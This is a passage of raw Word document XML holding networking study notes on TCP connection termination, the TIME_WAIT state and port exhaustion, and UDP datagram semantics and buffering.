    <w:p w14:paraId="27896727" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New TCP connections start slow</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (14 KB cwnd → ramps up over several RTTs). Short-lived connections never reach full bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46FFA2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection reuse (HTTP keep-alive, connection pooling) is critical</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — warm connections have large cwnd, fully utilizing available bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C9DA19" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single TCP connection over high-latency link</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> may not saturate bandwidth (BDP limitation). Multiple parallel connections or HTTP/2 multiplexing helps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C0A84D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 Connection Termination (Four-Way Handshake)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B058D28" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0502B0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Client                              Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44D488" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419A40E5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │─── FIN ───────────────────────────&gt;│  1. Client done sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B862B6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFD1F0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │&lt;── ACK ────────────────────────────│  2. Server acknowledges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D15944A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6CC40" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │&lt;── FIN ────────────────────────────│  3. Server done sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14368659" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCC8AC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │─── ACK ───────────────────────────&gt;│  4. Client acknowledges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B14C5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98C2CE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │    Client enters TIME_WAIT         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576086B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  │    (waits 2×MSL ≈ 60–120s)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2DB175" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TIME_WAIT — why it exists and why it matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFDC560" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>After closing, the client holds the connection state for 2×MSL (Maximum Segment Lifetime, typically 60 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589AEB2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Ensures any delayed packets from this connection don't interfere with a NEW connection using the same port pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFFACB1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Ensures the final ACK reaches the server (if lost, server will retransmit FIN, and client can re-ACK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490EDD2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The TIME_WAIT problem at scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700844E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>A server handling 10,000 short-lived connections/second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E07735" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Each closed connection occupies a socket in TIME_WAIT for 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A020C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>10,000 × 60 = 600,000 sockets in TIME_WAIT simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D5F61" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Each socket consumes kernel memory (~400 bytes on Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1280B7A0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Port exhaustion: only 65,535 ports available per destination IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F112F1E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149825F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>SO_REUSEADDR / SO_REUSEPORT: allow port reuse despite TIME_WAIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B1C59" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>tcp_tw_reuse: allow reusing TIME_WAIT connections for new outgoing connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B781F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Connection pooling: reuse connections instead of creating/closing frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC10F5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1378"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>HTTP keep-alive: don't close connections between requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C835CB9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="60DF45C0">
          <v:rect id="_x0000_i5015" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688F740" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. UDP — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F824E7A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 How UDP Works (Simplicity Is the Feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4509A4D1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sending a UDP datagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04C191" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378290C6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application calls: sendto(socket, data, dest_ip, dest_port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F8BF24" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  1. Kernel prepends 8-byte UDP header (src port, dst port, length, checksum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC99F4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  2. Kernel prepends IP header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0EA91" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  3. Kernel sends to NIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963B337" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  4. NIC puts on wire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF0618" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Done. No state. No waiting. No acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F99AA4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receiving a UDP datagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE49D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395382CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>NIC receives packet → Kernel checks IP header → routes to UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD5660" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  1. Kernel checks UDP checksum (if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077781C3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  2. Kernel looks up destination port → finds socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9C400" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  3. Kernel places datagram in socket receive buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0E349" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  4. Application calls recvfrom() → gets the datagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C0C3C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What UDP does NOT do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE33CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No connection setup (no handshake — send immediately).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0585A0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No reliability (packet lost? UDP doesn't know or care).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E442A3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No ordering (packets arrive in whatever order the network delivers them).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDD3644" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No flow control (sender can overwhelm receiver's buffer → excess packets dropped silently).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34779A62" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No congestion control (sender can flood the network — application must self-regulate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A669C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No fragmentation/reassembly at transport layer (relies on IP fragmentation or application sizing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEF53AC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1379"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>No stream abstraction (each sendto() = one discrete datagram).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769E7FE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Datagram Semantics vs. Stream Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5D484" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP — Byte Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E68C3E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689EFA84" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender writes: "Hello" then "World" then "!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FD8B8C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver might read: "HelloWor" then "ld!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF3B6C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>(Message boundaries are NOT preserved. It's a continuous stream of bytes.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7759A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application must implement its own message framing (length-prefix, delimiter, fixed-size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706766D7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP — Message-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E13466" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA41547" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender writes: "Hello" (one datagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D13809" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender writes: "World" (another datagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F72AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sender writes: "!" (another datagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF6D01" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="73C59980" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver reads: "Hello" (complete, one datagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9EB10B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver reads: "World" (complete, one datagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FAE26B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Receiver reads: "!" (complete, one datagram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCDA3E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>(OR: "World" arrives before "Hello" — out of order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD5F48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>(OR: "World" never arrives — lost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D1012" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>(But each received datagram is COMPLETE and intact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E3DE3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Message boundaries are preserved.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Each sendto() = one discrete datagram received (or not received) as a unit. No partial datagrams. No merging of datagrams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518DB8D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 UDP Buffer Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AB5889" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Send path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39704EF8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1380"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application calls sendto().</w:t>
      </w:r>
    </w:p>
